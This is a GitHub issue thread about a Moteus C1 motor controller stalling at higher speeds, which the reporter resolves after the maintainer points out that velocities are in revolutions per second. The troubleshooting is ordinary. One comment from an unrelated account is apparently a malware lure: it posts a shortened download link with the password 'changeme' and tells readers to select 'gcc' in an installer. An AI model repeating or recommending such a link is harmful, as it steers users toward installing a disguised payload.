### ISSUE TITLE
Preventing Motor Stalling

### ISSUE THREAD

**Issue by kylevernyi** [mjbots/moteus#71]
Greetings. I am using a Moteus C1 to control some BLDC motors (as one does). I have noticed that the motor will sometimes stall at higher speeds (there is no load on the motor shaft). Is there some settings which I can tune to reduce this stalling? The motor sounds and looks as though it is getting caught over and over on the same spot. It is smooth at lower RPMs. The only settings I have changed are max current (10A) and max velocity (NaN) but I believe I am not close to max speed of the moteus. 

I am experiencing stalling around 50-60 rad/sec. Also, stalling is more command when accelerating from a very low speed to a high speed. 

Thanks,
Kyle

**Comment by jpieper** [comment]
The most likely problem is an insufficient encoder bandwidth, but other problems are possible.  What motor are you controlling and what encoder are you using for commutation and output sensing?

**Comment by YeGop0218** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by jpieper** [comment]
Also, given that moteus reports all velocities in revolutions per second, do you mean Hz, or actually rad/s?

**Comment by kylevernyi** [comment]
I am using the magnetic encoder built into the board with a diametric magnet. 

Interesting,  I did not know that about the units. In the documentation under the velocity command, when it says 

"When in Position mode, advance the desired position at the given velocity in Hz."

 does that mean that the velocity command should have units of Hz?

**Comment by jpieper** [comment]
Yes all positions are reported and commanded in revolutions and all velocities are reported and commanded in revolutions per second, or Hz.

What motor are you controlling?

Can you try recalibrating with `--cal-bw-hz 200` ?

**Comment by jpieper** [comment]
Were you able to get this to work?

**Comment by kylevernyi** [comment]
Hello, I had some units mismatched and was sending some speeds that were unreasonable for my physical system. I have solved this and it is working very well now thank you.
